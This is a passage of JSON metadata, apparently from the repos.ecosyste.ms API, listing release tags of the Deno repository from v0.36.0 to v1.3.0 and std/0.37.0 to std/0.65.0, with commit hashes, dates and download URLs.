itHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0